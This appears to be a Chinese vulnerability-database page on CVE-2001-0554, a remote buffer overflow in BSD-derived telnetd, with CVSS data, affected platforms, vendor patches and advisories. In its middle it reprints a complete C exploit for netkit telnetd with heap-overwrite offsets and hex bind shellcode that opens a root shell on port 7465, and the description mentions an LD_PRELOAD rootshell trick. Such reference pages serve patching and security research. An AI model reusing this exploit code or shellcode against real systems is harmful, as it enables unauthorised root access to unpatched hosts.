CVE-2001-0554
CVSS10.0
发布时间 :2001-08-14 00:00:00
修订时间 :2008-09-05 16:24:23
NMCOEP    

[原文]Buffer overflow in BSD-based telnetd telnet daemon on various operating systems allows remote attackers to execute arbitrary commands via a set of options including AYT (Are You There), which is not properly handled by the telrcv function.


[CNNVD]多家厂商基于BSD系统Telnetd远程堆溢出漏洞(CNNVD-200108-082)

        
        Telnet是一个广泛使用的明文的远程连接虚拟终端协议,可以用来对远程计算机进行操作。目前使用最多的telnetd版本都是源于BSD telnetd的某个派生。
        来源于BSD telnet守护程序的telnetd存在一个堆溢出漏洞,远程攻击者可能通过溢出攻击在主机上以telnetd守护进程的权限(通常是root)执行任意指令。
        在处理telnet协议选项的函数中没有进行有效的边界检查,当使用某些选项('AYT')时,可能发生缓冲区溢出。由于攻击者可以控制的字符是有限的而且溢出发生在BSS区,因此,攻击受到一定限制。但是发现者报告说至少在某些系统(FreeBSD/BSDI/NetBSD)下攻击是切实可行的,一个可用的攻击程序已经广泛流传。
        在Linux系统下,如果用户可以获取对系统的本地访问权限,它可以通过telnetd的漏洞为
        /bin/login设置环境变量,例如LD_PRELOAD=/tmp/make-rootshell.so 。
        如果用户没有本地访问权限,他可以覆盖一些块(chunk)结果,setenv(3)会使用这些结构,并在用户可以控制的内存取中一个新的chunk,因此当环境变量重新分配内存时会改变任意内存地址的值。
        最新的报告显示Linux netkit-telnetd <= 0.17版本都是受影响的,攻击者可能远程获取root权限。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:8.0
cpe:/o:netbsd:netbsd:1.1NetBSD 1.1
cpe:/a:mit:kerberos:1.0
cpe:/o:freebsd:freebsd:3.5.1FreeBSD 3.5.1
cpe:/o:netbsd:netbsd:1.5NetBSD 1.5
cpe:/o:netbsd:netbsd:1.3.2NetBSD 1.3.2
cpe:/o:ibm:aix:4.3.2IBM AIX 4.3.2
cpe:/o:ibm:aix:5.1IBM AIX 5.1
cpe:/a:mit:kerberos:5-1.2.1MIT Kerberos 5 1.2.1
cpe:/o:openbsd:openbsd:2.6OpenBSD 2.6
cpe:/o:sun:solaris:2.4
cpe:/o:netbsd:netbsd:1.3NetBSD 1.3
cpe:/o:netbsd:netbsd:1.4NetBSD 1.4
cpe:/o:freebsd:freebsd:4.2FreeBSD 4.2
cpe:/o:openbsd:openbsd:2.4OpenBSD 2.4
cpe:/o:netbsd:netbsd:1.2NetBSD 1.2
cpe:/o:netbsd:netbsd:1.4.1NetBSD 1.4.1
cpe:/o:netbsd:netbsd:1.3.1NetBSD 1.3.1
cpe:/o:sun:solaris:2.3
cpe:/o:openbsd:openbsd:2.1OpenBSD 2.1
cpe:/o:sun:solaris:2.1
cpe:/a:mit:kerberos:5-1.2MIT Kerberos 5 1.2
cpe:/o:sun:solaris:7.0
cpe:/o:openbsd:openbsd:2.0OpenBSD 2.0
cpe:/o:sun:solaris:2.5
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:2.0
cpe:/a:netkit:linux_netkit:0.11
cpe:/o:sun:solaris:2.5.1
cpe:/o:openbsd:openbsd:2.3OpenBSD 2.3
cpe:/a:mit:kerberos:5_1.1.1MIT Kerberos 5 1.1.1
cpe:/o:ibm:aix:4.3IBM AIX 4.3
cpe:/o:ibm:aix:4.3.1IBM AIX 4.3.1
cpe:/o:openbsd:openbsd:2.5OpenBSD 2.5
cpe:/a:mit:kerberos:5-1.2.2MIT Kerberos 5 1.2.2
cpe:/o:netbsd:netbsd:1.5.1NetBSD 1.5.1
cpe:/o:openbsd:openbsd:2.7OpenBSD 2.7
cpe:/a:netkit:linux_netkit:0.10
cpe:/o:netbsd:netbsd:1.4.2NetBSD 1.4.2
cpe:/o:netbsd:netbsd:1.2.1NetBSD 1.2.1
cpe:/o:netbsd:netbsd:1.0NetBSD 1.0
cpe:/o:openbsd:openbsd:2.2OpenBSD 2.2
cpe:/o:sun:solaris:2.2
cpe:/o:sgi:irix:6.5SGI IRIX 6.5
cpe:/o:netbsd:netbsd:1.3.3NetBSD 1.3.3
cpe:/a:netkit:linux_netkit:0.12
cpe:/a:mit:kerberos:5_1.1MIT Kerberos 5 1.1
cpe:/o:freebsd:freebsd:4.3FreeBSD 4.3
cpe:/o:freebsd:freebsd:4.1.1FreeBSD 4.1.1
cpe:/o:openbsd:openbsd:2.8OpenBSD 2.8
cpe:/o:ibm:aix:4.3.3IBM AIX 4.3.3
cpe:/o:netbsd:netbsd:1.4.3NetBSD 1.4.3

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1828Buffer Overflow in "in.telnetd"or "telnetd"Process
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0554
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0554
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-082
(官方数据源) CNNVD

- 其它链接及资源

http://www.cert.org/advisories/CA-2001-21.html
(VENDOR_ADVISORY)  CERT  CA-2001-21
http://www.securityfocus.com/bid/3064
(VENDOR_ADVISORY)  BID  3064
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:49.telnetd.asc
(VENDOR_ADVISORY)  FREEBSD  FreeBSD-SA-01:49
http://xforce.iss.net/static/6875.php
(UNKNOWN)  XF  telnetd-option-telrcv-bo(6875)
http://www.securityfocus.com/archive/1/197804
(VENDOR_ADVISORY)  BUGTRAQ  20010718 multiple vendor telnet daemon vulnerability
http://www.redhat.com/support/errata/RHSA-2001-100.html
(UNKNOWN)  REDHAT  RHSA-2001:100
http://www.redhat.com/support/errata/RHSA-2001-099.html
(UNKNOWN)  REDHAT  RHSA-2001:099
http://www.osvdb.org/809
(UNKNOWN)  OSVDB  809
http://www.novell.com/linux/security/advisories/2001_029_nkitb_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2001:029
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-068.php3
(UNKNOWN)  MANDRAKE  MDKSA-2001:068
http://www.debian.org/security/2001/dsa-075
(UNKNOWN)  DEBIAN  DSA-075
http://www.debian.org/security/2001/dsa-070
(UNKNOWN)  DEBIAN  DSA-070
http://www.cisco.com/warp/public/707/catos-telrcv-vuln-pub.shtml
(UNKNOWN)  CISCO  20020129 Cisco CatOS Telnet Buffer Vulnerability
http://www.ciac.org/ciac/bulletins/l-131.shtml
(UNKNOWN)  CIAC  L-131
http://www.calderasystems.com/support/security/advisories/CSSA-2001-030.0.txt
(UNKNOWN)  CALDERA  CSSA-2001-030.0
http://online.securityfocus.com/archive/1/203000
(UNKNOWN)  BUGTRAQ  20010810 ADV/EXP: netkit <=0.17 in.telnetd remote buffer overflow
http://online.securityfocus.com/archive/1/199541
(UNKNOWN)  BUGTRAQ  20010725 SCO - Telnetd AYT overflow ?
http://online.securityfocus.com/archive/1/199496
(UNKNOWN)  BUGTRAQ  20010725 Telnetd AYT overflow scanner
http://online.securityfocus.com/advisories/3476
(UNKNOWN)  IBM  MSS-OAR-E01-2001:298
http://ftp.support.compaq.com/patches/.new/html/SSRT0745U.shtml
(UNKNOWN)  COMPAQ  SSRT0745U
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000413
(UNKNOWN)  CONECTIVA  CLA-2001:413
http://archives.neohapsis.com/archives/hp/2001-q4/0014.html
(UNKNOWN)  HP  HPSBUX0110-172
ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.10/CSSA-2001-SCO.10.txt
(UNKNOWN)  CALDERA  CSSA-2001-SCO.10
ftp://patches.sgi.com/support/free/security/advisories/20010801-01-P
(UNKNOWN)  SGI  20010801-01-P
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2001-012.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2001-012

- 漏洞信息

多家厂商基于BSD系统Telnetd远程堆溢出漏洞
危急 未知
2001-08-14 00:00:00 2007-05-11 00:00:00
远程  
        
        Telnet是一个广泛使用的明文的远程连接虚拟终端协议,可以用来对远程计算机进行操作。目前使用最多的telnetd版本都是源于BSD telnetd的某个派生。
        来源于BSD telnet守护程序的telnetd存在一个堆溢出漏洞,远程攻击者可能通过溢出攻击在主机上以telnetd守护进程的权限(通常是root)执行任意指令。
        在处理telnet协议选项的函数中没有进行有效的边界检查,当使用某些选项('AYT')时,可能发生缓冲区溢出。由于攻击者可以控制的字符是有限的而且溢出发生在BSS区,因此,攻击受到一定限制。但是发现者报告说至少在某些系统(FreeBSD/BSDI/NetBSD)下攻击是切实可行的,一个可用的攻击程序已经广泛流传。
        在Linux系统下,如果用户可以获取对系统的本地访问权限,它可以通过telnetd的漏洞为
        /bin/login设置环境变量,例如LD_PRELOAD=/tmp/make-rootshell.so 。
        如果用户没有本地访问权限,他可以覆盖一些块(chunk)结果,setenv(3)会使用这些结构,并在用户可以控制的内存取中一个新的chunk,因此当环境变量重新分配内存时会改变任意内存地址的值。
        最新的报告显示Linux netkit-telnetd <= 0.17版本都是受影响的,攻击者可能远程获取root权限。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 建议您关闭telnet,换用ssh或openssh
        由于telnet使用明文传输信息,从协议本身上存在先天的安全脆弱性,很容易受到各种窃听、回放、劫持攻击,因此我们建议使用相对安全得多的基于SSH加密协议的远程连接工具代替telnet进行远程管理。
        厂商补丁:
        BSDI
        ----
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        BSDi BSD/OS 4.2:
        
        http://www.bsdi.com/services/support/patches/patches-4.2/i386/M420-014

        BSDi BSD/OS 4.1:
        
        http://www.bsdi.com/services/support/patches/patches-4.1/M410-043

        Conectiva
        ---------
        Conectiva已经为此发布了一个安全公告(CLA-2001:413)以及相应补丁:
        CLA-2001:413:telnet
        链接:
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000413

        补丁下载:
        ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/telnet-0.17-1U40_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/telnet-0.17-1U40_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/telnet-0.17-1U40_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/telnet-0.17-1U40_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/telnet-0.17-1U41_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/telnet-0.17-1U41_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/telnet-0.17-1U42_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/telnet-0.17-1U42_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/telnet-0.17-1U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/telnet-0.17-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/telnet-server-0.17-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/telnet-0.17-1U51_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/telnet-server-0.17-1U51_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/telnet-0.17-1U51_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/telnet-0.17-2U60_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/telnet-server-0.17-2U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/telnet-0.17-2U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/telnet-0.17-2U70_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/telnet-0.17-2U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/telnet-server-0.17-2U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/telnet-0.17-1U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/telnet-0.17-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/telnet-server-0.17-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/telnet-0.17-1U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/telnet-0.17-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/telnet-server-0.17-1U50_1cl.i386.rpm
        Conectiva Linux version 6.0及以上版本的用户可以使用apt进行RPM包的更新:
        - 把以下的文本行加入到/etc/apt/sources.list文件中:
        
        rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates
        (如果你不是使用6.0版本,用合适的版本号代替上面的6.0)
        - 执行: apt-get update
        - 更新以后,再执行: apt-get upgrade
        FreeBSD
        -------
        FreeBSD已经为此发布了一个安全公告(FreeBSD-SA-01:54)以及相应补丁:
        FreeBSD-SA-01:54:telnetd contains remote buffer overflow
        链接:ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:54.ports-telnetd.asc
        补丁下载:
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
        HP
        --
        HP已经为此发布了一个安全公告(HPSBUX0110-172)以及相应补丁:
        HPSBUX0110-172:Sec. Vulnerability in telnetd
        链接:
        补丁下载:
        ftp://us-ffs.external.hp.com/hp-ux_patches
        系统版本和补丁号对应关系:
         10.01 PHNE_24820,
         10.10 PHNE_24820,
         10.20 PHNE_24821,
         SIS 10.20 PHNE_24822 (Telnet kerberos Patch),
         10.24 PHNE_25217.
        补丁安装方法:
         1. 在安装补丁之前备份系统。
         2. 以root身份登录。
        
         3. 把patch复制到/tmp目录。
        
         4. 转到/tmp目录unshar补丁程序:
        
         cd /tmp
         sh PHCO_xxxxxx
        
         5a. 对一个单独的系统,运行swinstall来安装补丁:
        
         swinstall -x autoreboot=true -x match_target=true \

- 漏洞信息 (21018)

Solaris 2.x/7.0/8,IRIX 6.5.x,OpenBSD 2.x,NetBSD 1.x,Debian 3,HP-UX 10 Telnetd Buffer Overflow (EDBID:21018)
unix remote
2001-07-18 Verified
0 Dvorak
N/A [点击下载]
source: http://www.securityfocus.com/bid/3064/info

A boundary condition error exists in telnet daemons derived from the BSD telnet daemon.

Under certain circumstances, the buffer overflow can occur when a combination of telnet protocol options are received by the daemon. The function responsible for processing the options prepares a response within a fixed sized buffer, without performing any bounds checking.

This vulnerability is now being actively exploited. A worm is known to be circulating around the Internet. 

#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>

/*********************************************************************
       Proof of concept netkit-0.17-7 local root exploit.

 Exploits buffer overflow in the AYT handling of in.telnetd, 
 due to bad logic in the handling of snprintf(), and 

      TESO advisory details were enough to allow me to put 
        controlable addresses in arbitary heap locations. 

    Heap based exploit. Overflow allows rewriting of some heap 
     data, which allowed me to put a new heap structure in the 
          input buffer, which let me do whatever I want.

'traceroute exploit story -  By Dvorak, Synnergy Networks' was very
 helpful. Also malloc.c was good. 

*********************************************************************/
/*
                         Notes about exploit                       

1) RedHat 7.0, exploiting localhost
2) hostname is clarity.local
3) It probably won't work without at least a different setting for
   the --size option, and probably the --name option as well. The
   --name arguemnt  is the hostname part of the string that gets 
   returned by the AYT command, which may be different to the name
   of the address you are connecting to..
4) There are a lot of things that use the heap, making the size 
   depend on alot of factors. 

5) You will might need to change some (or all) of the offsets. 
   This program does allow you to brute force, if the hostname returned 
   by the AYT command is not a multiple of 3 letters long.
 
 It is also possibly (at least according to some quick testing I did)
 exploitable on some (all?) servers with names that are multiples of three
 letters long, using the Abort Output command to add 2 characters to the
 output length, and exploit the heap in a similar manner to this method.
 
 (You can only directly put user controlable characters in 2 out of 3
 locations (ie: no AO will give you a multiple of 3 bytes on the heap, AO
 will give you 2 more than a multiple of 3 bytes) with controllable
 characters, but when you count the null added by the netoprintf(), and use
 0 as an option to a do or will, you can sometimes create valid chunks that
 point to locations you can control. I have only tested this method with a 
 simulation, but it seems it would probably work with the telnetd as well.
 I will look into it when I have time. Maybe.)
 

                       .  .  _  _   _  _ .  .     _  _  _ .  .
 |_  _|_ _|_  _ .  / / |\/| |_| _| |  | ||\/|  / |  | ||_ |  |
 | |  |   |  |_|. / /  |  | |   _|.|_ |_||  | /  |_ |_| _| \/ 
             |
 *********************************************************************/




#define SERVER_PORT 23

#define ENV 18628

int offset12[] = {
// netibuf[343]->the chunk start.
  -4, 0xaa,
  -5, 0xbb,
  -6, 0xcc,
  -7, 0x10,
  -9, 0xdd,
  -10, 0x68,
  -12, 0xee,
  -13, 0x88,
  -14, 0x99,
  0, 0x00
};

int offset3[]={
-1,0x00,
0,0
};

int *offsets=offset12;


int dalen = 0;
int big;
int small;
int mipl = 0;
int ninbufoffset;
char spinchars[] = "/|\\-";

char tosend[] = {
  0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb, 0x1f, 0xff, 0xfb, 0x20,
  0xff, 0xfb, 0x21, 0xff, 0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05,
  0xff, 0xfb, 0x23, 0
};

char lamagra_bind_code[] =
// the NOPs are my part... to jump over the modified places, 
// without me having to take a look to see where they are.
// Modified to listen on 7465 == TAGS and work thru TELNET protocol.
  "\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90"
  "\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90"
  "\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90"
  "\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90"
  "\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90"
  "\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
  "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
  "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1d\x29\x89\x4d\xf0"
  "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
  "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
  "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
  "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
  "\x8d\x55\x0c\xcd\x80\xe8\xe3"
  "\xff\xff\xff\xff\xff\xff/bin/sh";

char *shellcode = lamagra_bind_code;

int sock;			/* fd for socket connection */
FILE *dasock;			/* for doing fprint et al   */
struct sockaddr_in server;	/* the server end of the socket  */
struct hostent *hp;		/* Return value from gethostbyname() */
char buf[40960];		/* Received data buffer */
char sock_buf[64 * 1024];	/* Received data buffer */

char daenv[10000];
char oldenv[10000];

extern int errno;
read_sock ()
{
  /* Prepare our buffer for a read and then read. */
  bzero (buf, sizeof (buf));
  if (read (sock, buf, sizeof (buf)) < 0)
    if (errno != 11)
      {
	perror ("! Socket read");
	exit (1);
      }
}

sock_setup ()
{
  int flags;
  int yes = 1;
  if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
    {
      perror ("! Error making the socket\n");
      exit (1);
    }
  bzero ((char *) &server, sizeof (server));
  server.sin_family = AF_INET;
  if ((hp = gethostbyname ("localhost")) == NULL)
    {
      fprintf (stderr, "! localhost unknown??\n");
      exit (1);
    }
  bcopy (hp->h_addr, &server.sin_addr, hp->h_length);
  server.sin_port = htons ((u_short) SERVER_PORT);

  /* Try to connect */
  if (connect (sock, (struct sockaddr *) &server, sizeof (server)) < 0)
    {
      perror ("! Error connecting\n");
      exit (1);
    }

  dasock = (FILE *) fdopen (sock, "w+");
  if (!dasock)
    {
      perror ("! Bad fdopen happened");
      exit (1);
    }

/****************************************
 Thanks to xphantom for the next 4 lines.
 (which i don't need anymore   ;? )
 
  flags = fcntl(sock, F_GETFL, 0); 
  flags |= O_NONBLOCK; 
  fcntl(sock, F_SETFL, flags);
  if (setsockopt(sock, SOL_SOCKET, SO_OOBINLINE, &yes,sizeof(yes)) == -1) {
        perror("setsockopt");
        exit(1);
  }  
*****************************************/


  setbuffer (dasock, sock_buf, 64 * 1024);

}

do_iac (char c)
{
  putc (0xff, dasock);
  putc (c, dasock);
}

do_ayt ()
{
  do_iac (0xf6); // sets buffer length to 2
}

doo (char c)
{
  putc (255, dasock);
  putc (253, dasock);
  putc (c, dasock);
}
will (char c)
{
  putc (255, dasock);
  putc (251, dasock);
  putc (c, dasock);
}
wont (char c)
{
  putc (255, dasock);
  putc (252, dasock);
  putc (c, dasock);
}

void
solve (int remain)
{
  int x, y;
  big = -100;
  small = -100;
  for (x = 0; x < 120; x++)
    for (y = 2; y < 80; y++)
      {
	if (((y * 3) + (x * dalen)) == remain)
	  {
	    big = x;
	    small = y;
	    return;
	  }
      }
      fprintf (stderr, "I still can't work it out.\n\n");
      exit (1);
}

push_clean ()
{
  int l;
  for (l = 0; l < 8192; l++)
    putc (0, dasock);	
}

push_heap_attack ()
{
  int l;
  int shaddr = 0x805c970;
  int overwrite = 0x08051e78;	// fopen
  int tosend[] = {
    0x805670eb,
    0x8,
    shaddr,
    shaddr,
    0x0,
    0x0,
    overwrite - 12,
    shaddr
  };
  fwrite (shellcode, strlen (shellcode), 1, dasock);
  for (l = strlen (shellcode); l < 289 + ninbufoffset; l++)
    putc (0, dasock);
  fwrite (tosend, 8, 4, dasock);
  fflush (dasock);
}

fill2 (int count, char with, int real)
{
  int l;
  int first, rest, find;

  first = (int) (count / dalen) - 10;
  rest = (int) (((count) % dalen) / 3) * 3;
  find = count - ((first * dalen) + (rest * 3));
  solve (find);
  first += big;
  rest += small;
  for (l = 0; l < first; l++)
    do_ayt ();
  for (l = 0; l < rest; l++)
    will (with);
  if (real == 1)
    {
      push_clean ();
    }
}

fill (int count, char with)
{
  fprintf (stderr, "  o Length %d char %d (%02x)\n",
	   count, with & 0xff, with & 0xff);
  fflush (stderr);
  fill2 (8257, 'z', 0);		// first part
  fill2 (count - 8257, with, 1);	// do it for real
}

doenv (char *danam, char *daval)
{
  sprintf (daenv, "%c%c%c%c%c%s%c%s%c%c",
       /*  IAC   SB N-E IS VAR  name VAL value  IAC  SE  */
	   255, 250, 39, 0, 0, danam, 1, daval, 255, 240);

  fwrite (daenv, 512, 1, dasock);
  fflush (dasock);
}

main (int argc, char *argv[])
{
  int br, l, dosleep = 0;
  int percent = 0;
  char spin;
  unsigned char w;
  bzero (oldenv, sizeof (oldenv));
  argv++;
  dalen = strlen ("clarity.local");
  while (argv[0])
    {
      if (!strcmp (argv[0], "--pause"))
	dosleep = 1;

      if (!strcmp (argv[0], "--size") && argv[1])
	{
	  mipl = atoi (argv[1]);
	  argv++;
	}

      if (!strcmp (argv[0], "--name") && argv[1])
	{
	  dalen = strlen (argv[1]);
	  argv++;
	}
      argv++;
    }
  fprintf (stderr, "  o MiPl of %4d  o NameLen of %2d\n", mipl, dalen);
  if(dalen%3==0)
  {
   offsets=offset3;
  }
  else
  {
   ninbufoffset = mipl % 8192;
   offsets[11] += 32 * (mipl - ninbufoffset) / 8192;
   if (offsets[11] > 255)
     {
       fprintf (stderr, "  ! MiPl too big.", mipl, dalen);
       exit (1);
     }
   }
  sock_setup ();
  if (dosleep)
    {
      system ("sleep 1;ps aux|grep in.telnetd|grep -v grep");
      sleep (8);
    }

  dalen += strlen ("\r\n[ : yes]\r\n");
  fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n");
  fflush (stderr);
  doo (5);
  will (39);
  fflush (dasock);
  read_sock ();
  fprintf (stderr, "o Setting up environment vars...\n");
  fflush (stderr);
  will (1);
  push_clean ();
  doenv ("USER", "zen-parse");
  doenv ("TERM", "zen-parse");
  will (39);
  fflush (dasock);
  fprintf (stderr, "o Doing overflows...\n");
  fflush (stderr);
  for (br = 0; (offsets[br] || offsets[br + 1]); br += 2)
    {
      fill (mipl + ENV + offsets[br], offsets[br + 1]);
      fflush (dasock);
      usleep (100000);
      read_sock ();
    }
  fprintf (stderr, "o Overflows done...\n");
  fflush (stderr);
  push_clean ();

  fprintf (stderr, "o Sending IACs to start login process...\n");
  fflush (stderr);
  wont (24);
  wont (32);
  wont (35);
  fprintf (dasock, "%s", tosend);
  will (1);
  push_heap_attack ();
  sleep (1);
  fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n");
  execlp ("nc", "nc", "-v", "localhost", "7465", 0);
  fprintf (stderr,
	   "o If the exploit worked, there should be an open port on 7465.\n");
  fprintf (stderr, "  It is a root shell. You should probably close it.\n");
  fflush (stderr);
  sleep (60);
  exit (0);
}
/********************************************************************

 Thanks to xphantom for the help with getting the some of the socket 
 stuff working properly. Erm. I didn't end up using that method, but
                         thanks anyway. ;]

This code is Copyright (c) 2001 zen-parse
Use and distribution is unlimited, provided the code is not modified.
If the code, including any of text is modified, that version may not
be redistrubuted.

********************************************************************/
/* ObPlug 4 My Band: gone platinum, Chapel of Stilled voices, from */
/********************************************************************
            Remember to visit Chapel of Stilled Voices:
                                 _                 _     _ .  .
   |_  _|_ _|_  _ .  / /.  .  _  _|  _  _ .  .  / |   _ |_ |  |
   | |  |   |  |_|. / / |\/| |_| _|.|_ |_||\/| /  |_ |_| _| \/ 
  - - - - - - -|- - - - - - -|- - - - - - - - - - - - - - - - - -
               |             |
If there is anything below the next line someone is not following the
rules.  --zen-parse
************************************END*****************************/
		

- 漏洞信息 (F34414)

debian.telnetd.txt (PacketStormID:F34414)
2004-09-21 00:00:00
Michal Zalewski  
advisory,remote,root
linux,debian
CVE-2001-0554
[点击下载]

The Netkit telnetd implementation shipped with Debian Linux appears to be lacking the AYT vulnerability patch. This exposes the platform to a remote root problem discovered by scut of TESO back in 2001.

Exposure:

  Remote root compromise through buffer handling flaws

Confirmed vulnerable:

  Up-to-date Debian 3.0 woody (issue is Debian-specific)
  Debian netkit-telnet-ssl-0.17.24+0.1 package
  Debian netkit-telnet-ssl-0.17.17+0.1 package

Mitigating factors:

  Telnet service must be running and accessible to the attacker.
  Nowadays, telnet service presence on newly deployed Linux hosts is
  relatively low. The service is still used for LAN access from other unix
  platforms, and to host various non-shell services (such as MUDs).

Problem description:

  Netkit telnetd implementation shipped with Debian Linux appears to be
  lacking the AYT vulnerability patch. This patch was devised by Red Hat
  (?) and incorporated into Debian packages, but later dropped.

  This exposes the platform to a remote root problem discovered by scut of
  TESO back in 2001 (CVE-2001-0554), as well as to other currently
  unpublished flaws associated with the old buffer handling code, and
  elliminated by the Red Hat's overhaul of buffer handling routines.

  Based on a review of package changelogs, my best guess is that the patch
  was accidentally dropped by Christoph Martin in December 2001, but I
  have not researched the matter any further.

Vendor response:

  I have contacted Debian security staff on August 29, and received a
  confirmation of the problem from Matt Zimmerman shortly thereafter.

  Since this is not a new flaw, I did not plan to release my own advisory,
  hoping they will release a DSA bulletin and fix the problem. Three weeks
  have passed, however, and Debian did not indicate any clear intent to
  release the information any time soon. They did release nine other
  advisories in the meantime, some of which were of lesser importance.

  As such, I believe it is a good idea to bring the problem to public
  attention, particularly since those running telnetd were and are,
  unbeknownst to them, vulnerable to existing exploits.

Workaround:

  Disable telnet service if not needed; manually apply Red Hat
  netkit patches, or compile the daemon from Red Hat sources.

  Note that netkit as such is no longer maintained by the author, and
  hence obtaining the most recent source tarball (0.17) is NOT
  sufficient. You may also examine other less popular telnetd
  implementations, but be advised that almost all are heavily based on the
  original code, and not always up-to-date with security fixes for that
  codebase.


PS. Express your outrage: http://eprovisia.coredump.cx.
    

- 漏洞信息

809
Multiple BSD Telnet telrcv Functin Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

A remote overflow exists in multiple BSD-based telnet daemons. The 'telrcv' function fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2001-07-18 2001-07-18
Unknow Unknow

- 解决方案

Contact your vendor for an appropriate upgrade. An upgrade is required as there are no known workarounds.

- 相关参考

